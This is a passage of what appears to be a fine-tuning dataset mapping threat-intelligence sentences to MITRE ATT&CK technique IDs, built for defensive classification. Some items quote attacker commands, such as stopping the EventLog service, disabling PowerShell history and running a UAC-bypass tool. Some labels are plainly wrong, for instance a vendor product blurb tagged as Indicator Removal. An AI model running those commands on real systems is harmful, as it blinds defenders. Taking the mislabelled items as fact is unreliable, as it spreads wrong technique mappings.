framework.,Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for Phishing for Information or Phishing.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries often target DNS and web services, however others have been targeted as well.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer can use an arbitrary system service to load at system boot for persistence and replaces the ImagePath registry value of a Windows service with a new backdoor binary.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes collects its process identifier on the victim.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae has created a service named ""Windows Update Agent1"" to appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has used HTTP in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has decrypted ELF files with AES.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ProLock can use .jpg and .bmp files to store its payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search the Registry on compromised systems for insecurely stored credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gather network addresses and operating system version Execute arbitrary commands using “cmd.exe /c” The capability to execute system commands### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has the ability to enumerate domain admin accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It’s also used to inject code into its target processes using the technique.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream named Zone.Identifier with a specific value known as the MOTW.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has installed updates and new malware on victims.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can create a new service using the service parser function ProcessScCommand.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface to simulate the replication process from a remote domain controller using a technique called DCSync.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may allow API callers to execute a binary, run a CLI command, load modules, etc.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Remsec loader implements itself with the name Security Support Provider, a legitimate Windows function.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy collects the OS version, computer name and serial number for the storage volume C:\.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TFTP boot is commonly used by network administrators to load configuration-controlled network device images from a centralized management server.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has encrypted its binaries via AES.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries , VBA add-ins, Office Component Object Model add-ins, automation add-ins, VBA Editor , Visual Studio Tools for Office add-ins, and Outlook add-ins.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used lures to get users to click links in emails and attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several examples of this weakness in existing common installers have been reported to software vendors.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has used multiple native APIs including ShellExecuteW to run executables,GetWindowsDirectoryW to create folders, and VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process injection.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 used publicly available tools to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language servers, and NetBIOS.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Retriever Trojan uses the following namespace: using pcchekapp.grp.ammar.samaneh; Android.The malware begins by creating a web service object and uses the following URL within its configuration: http:// service.chrome-up[.]date:8080 /WebService.asmx It then calls a function called “SetLog2”, which sets variables for the system’s IP address, MAC address and hostname### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has he ability to perform anti-sandboxing and anti-virtualization checks.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may downgrade and use less-secure versions of various features of a system, such as Command and Scripting Interpreters or even network protocols that can be abused to enable Adversary-in-the-Middle.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker can execute itself as a service.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke can detect a running process's PID on the infected machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO mechanism.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key or to render data permanently inaccessible in cases where the key is not saved or transmitted.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson contains a command to collect and exfiltrate emails from Outlook.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can decrypt its C2 address upon execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu uses mshta.exe to load its program and files.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon handles Kerberos tickets.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Within an XDG autostart entry file, the Type key specifies if the entry is an application , link or directory .### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT uses PowerShell scripts for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It contains functionality to add helper DLLs for extending functionality of the utility.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Although this API is deprecated, it still fully functions in the latest releases of macOS.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST collected all network interface MAC addresses that are up and not loopback devices, as well as IP address, DHCP configuration, and domain information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,External Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest invokes time call to check the system's time, executes a sleep command, invokes a second time call, and then compares the time difference between the two time calls and the amount of time the system slept to identify the sandbox.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Steganographic techniques can be used to hide data in digital messages that are transferred between systems.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries or executables .### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,capture webcam data ### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet uses an RPC server that contains a routine for file deletion.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has collected e-mail addresses for users they intended to target.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This value will serve as the program that will be executed when a user logs into the computer.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok exfiltrates logs of its execution stored in the /tmp folder over FTP using the curl command.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WMI classes are the primary structure within WMI### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson contains a command to collect information about anti-virus software on the victim.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkVishnya created new services for shellcode loaders distribution.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used the Stealer One credential stealer to target web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can record keystrokes from both the keyboard and virtual keyboard.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux Rabbit sends the payload from the C2 server as an encoded URL parameter.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie runs the command: net start >> %TEMP%\info.dat on a victim.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to display network connections: netstat -ano >> %temp%\download APT1 used the net use command to get a listing on network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,McAfee ATR has now discovered additional implants that are part of an operation to gain persistence for continued data exfiltration and for targeted access### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has sent phishing emails that contain a link to an external server with ZIP and RAR archives.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They can be purchased or, in some cases, acquired for free.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer has used Process Doppelgänging to evade security software while deploying tools on compromised systems.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor’s plugin deletes the collected files and log files after exfiltration.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze also calls certain functions dynamically to hinder analysis.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used malware to set LoadAppInit_DLLs in the Registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows in order to establish persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Scarlet Mimic has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has dumped password hashes for use in pass the hash authentication attacks.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique may be combined with Masquerading to trick the user into granting escalated privileges to malicious code.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has used HTTP and HTTPS in communication with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, other applications on the targets machine might store sensitive authentication cookies in memory .### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can be seen in the following images taken from hxxp:// feeds.rapidfeeds[.]com/88604/, which is one of the dead drop resolvers we encountered in this sample: Figure 7 Dead drop resolver used by BADNEWS   In order to decrypt this data, the authors have included additional steps from previous versions### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The magic value 0xFEEDFACF that belongs to Mach-O Executable (64 bit) Methods GET_LAUNCHNAME and GET_LABELNAME will return the hardcoded name of the property list “.plist” for the root user (com.apple.screen.assistantd.plist) and for the regular user (com.apple.spell.agent.plist)### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack has used a dropper that embeds an encrypted payload as extra data.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has used the command-line interface.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific checks will vary based on the target and/or adversary, but may involve behaviors such as Windows Management Instrumentation, PowerShell, System Information Discovery, and Query Registry to obtain system information and search for VME artifacts.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN is obfuscated using the obfuscation tool called ConfuserEx.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Supported commands “upload“, “screenshot“, “Excel“, “Outlook“, “risk“, “reboot“, “shutdown“, “clean“### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 has used batch scripts and scheduled tasks to delete critical system files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout can call window.location.pathname to ensure that embedded files are being executed from the C: drive, and will terminate if they are not.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When that system component is executed through normal system operation the adversary's code will be executed instead.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DNS traffic may also be allowed even before network authentication is completed.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The C2 server used by XTunnel provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tunneling involves explicitly encapsulating a protocol within another.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Get2 has the ability to use HTTP to send information collected from an infected host to C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group then was able to authenticate to the intended victim's OWA portal and read hundreds of email communications for information on Middle East organizations.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Matryoshka is capable of stealing Outlook passwords.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT encodes many of its artifacts and is encrypted when downloaded.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use methods of capturing user input to obtain credentials or collect information.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used malware to collect information on files and directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can read data from files.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can inject code through calling VirtualAllocExNuma.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XTunnel uses SSL/TLS and RC4 to encrypt traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The primary difference was that this sample was encrypted and password protected, requiring the victim to enter in a password which was likely provided by the adversary to view the document### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, a Windows screensaver executable named March 25 \u202Excod.scr will display as March 25 rcs.docx.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk uses VMProtect to make reverse engineering the malware more difficult.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has used spoofed company emails that were acquired from email clients on previously infected hosts to target other individuals.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy uses HTTP and HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kasidet has the ability to download and execute additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can identify the computer name of a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware that can collect the victim’s username.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the Windows Credential Manager.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT has the capability to capture video from a webcam.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GeminiDuke collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon reboot, the system executes the script's contents as root, resulting in persistence.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may add junk data to protocols used for command and control to make detection more difficult.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats has used msiexec.exe to execute an MSI payload.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA can add, modify, and/or delete registry keys.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Visual Basic macro uses the following command line: cmd /c expand %TEMP%\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe The control server credential information contained in the CAB files is different: Decoded credential data contained in another ipnet.ini### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used IronPython scripts as part of the IronNetInjector toolchain to drop payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Credentials can then be used to perform Lateral Movement and access restricted information.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can obtain the computer name from a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf can use steganography to hide malicious code downloaded to the victim.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may buy, steal, or download software tools that can be used during targeting.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FlawedAmmyy enumerates the current user during the initial infection.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Catchamas stores the gathered data from the machine in .db files and .bmp files under four separate locations.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has mimicked the names of known executables, such as mediaplayer.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team's VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has renamed certutil and moved it to a different location on the system to avoid detection based on use of the tool.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may also incorporate Masquerading by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information can be used to enumerate offsets and gadgets otherwise hidden by process memory protections such as address space layout randomization .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic gathers information on local group names.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RunningRAT kills antimalware running process.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has delivered malicious links to achieve execution on the target system.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Digital certificates are issued by a certificate authority in order to cryptographically verify the origin of signed content.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data that is sent is compressed and then base64-encoded before being included in the requests### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WinMM sets a WH_CBT Windows hook to search for and capture files on the victim.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command ""05 01 00 01 c0 b8 3c e5 00 51"" and verifies that the first two bytes from the server are ""05 00"" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order)### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is not used on Linux due to the decentralized nature of the platform.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton prompts users for their credentials.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, in this new variant, all the DNS activity is initiated and executed solely from memory – unlike previous attacks which used PowerShell commands### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Loops or otherwise needless repetitions of commands, such as Pings, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux malware detection and prevention is not prevalent at this time, but Palo Alto Networks customers are protected through our next-generation security platform: IPS signature 14917 deployed to identify and prevent command and control activity The C2 domains and files mentioned in this report are blocked in our Threat Prevention product### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to steal documents from the local system including the print spooler queue.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has copied tools between compromised hosts using SMB.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has maintained persistence by modifying Registry run key value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT uses cmd.exe to execute scripts and commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork collected and exfiltrated files from the infected system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has performed large-scale scans in an attempt to find 